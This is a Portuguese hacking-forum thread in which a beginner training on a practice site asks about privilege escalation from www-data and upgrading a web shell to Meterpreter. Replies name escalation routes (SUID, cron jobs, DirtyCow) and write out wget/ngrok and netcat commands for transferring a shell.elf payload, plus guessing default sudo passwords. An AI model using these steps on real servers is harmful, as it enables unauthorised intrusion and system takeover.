CaveiraTech Fórum
collapse

Dúvida Shell upload e privilege escalation


Offline felipeluis222000

  • L4MM3R
  • *
    • Posts: 1
  • Liked: 0
  • Likes Given: 0
Boa noite, gostaria de tirar algumas duvidas, eu estava treinando no site da solyd bancocn.com e gostaria de saber se é possivel fazer privilege escalation a partir do usuario www-data ou se é possivel mudar a shell pra um meterpreter, sou iniciante e gostaria muito de saber se é possivel fazer isso no site do bancocn em especifico e se não é possivel fazer isso la, se seria possivel fazer em alguma outra situação


Offline muhx

  • SCR1PTK1DD13
  • ***
    • Posts: 137
  • Bravo Hotel
  • Liked: 50
  • Likes Given: 6
É completamente possível fazer isso. Tudo vai depender de como o servidor está funcionando (configurações, usuários, aplicações), a partir daí você pode tentar encontrar alguma falha (como por exemplo: SUID, Cron jobs, DirtyCow ou algum outro kernel exploit [são possíveis caminhos pra você encontrar alguma falha]), que te possibilite realizar uma escalação de privilégios.

Com relação à trocar a shell, somente realizando o upload da shell do metasploit pra lá.

« Última modificação: 22 de Outubro de 2020, 10:50 por muhx »


Offline AstraDark

  • L4MM3R
  • *
    • Posts: 24
  • Sou tipo de alienígena que não fica suave na nave.
    • tryhackme
  • Liked: 5
  • Likes Given: 0
You are not allowed to view links. Register or Login
Boa noite, gostaria de tirar algumas duvidas, eu estava treinando no site da solyd bancocn.com e gostaria de saber se é possivel fazer privilege escalation a partir do usuario www-data ou se é possivel mudar a shell pra um meterpreter, sou iniciante e gostaria muito de saber se é possivel fazer isso no site do bancocn em especifico e se não é possivel fazer isso la, se seria possivel fazer em alguma outra situação

É possível sim! Dependendo do servidor, após o envio da shell.php para o servidor, há como conseguir uma shell pelo metasploit utilizando o wget + ip do ngrok rodando http na porta 8080/caminho_da_shell. Alguns servidores permitem o download da shell pelo wget. Todavia, há uma outra forma de conseguir, fazendo upload da shell.elf pelo FTP ou pelo próprio netcat. Faça upload da shell.elf pelo netcat utilizando o: [font=Menlo, Monaco, Consolas, "Courier New", monospace]nc -n 10.10.10.10 44444 < shell.elf no servidor que vai receber a shell pela URL e [/font][font=Menlo, Monaco, Consolas, "Courier New", monospace]nc -vl 44444 > shell.elf na máquina que vai transferir a shell. Após isso, veja se consegue dar um sudo su com uma senha "padrão". Você pode tentar o escalonamento de privilégios através de vulnerabilidades no kernel. O própro metasploit pode ter alguns exploits.[/font]


~Astra
Aquele que luta com monstros deve acautelar-se, para não tornar-se, também, um monstro.

-Nietzsche


 

* CaveiraTech YouTube

* Facebook

Guilherme Junqueira
04 de Fevereiro de 2019, 18:01 por Guilherme Junqueira
Views: 67188 | Comments: 27

Infelizmente a seção de Grupos de estudos do fórum estava sendo usada por organizações criminosas para recruta...
Guilherme Junqueira
27 de Julho de 2018, 17:30 por Guilherme Junqueira
Views: 43429 | Comments: 64

Pessoal, estou pensando seriamente na possibilidade de criar um novo fórum, só que voltado 100% à programação....
Guilherme Junqueira
26 de Junho de 2018, 20:25 por Guilherme Junqueira
Views: 25662 | Comments: 41

Resolvi fazer uma enquete para ver qual o posicionamento político da maioria aqui no fórum. O Alobus já fez um...
Guilherme Junqueira
20 de Junho de 2018, 12:56 por Guilherme Junqueira
Views: 31190 | Comments: 63

Últimamente o fórum vem sofrendo com muitas pessoas postando pirataria e esse não é o intuito do mesmo. A pira...
Guilherme Junqueira
20 de Fevereiro de 2018, 20:18 por Guilherme Junqueira
Views: 19201 | Comments: 4

Boa noite pessoal, venho apresentar para vocêsYou are not allowed to view links. Register or Login...

* Equipe

Guilherme Junqueira admin Guilherme Junqueira
Administrador
Luiz Viana admin Luiz Viana
Administrador
Alobus gmod Alobus
Moderador Geral

* Tópicos Recentes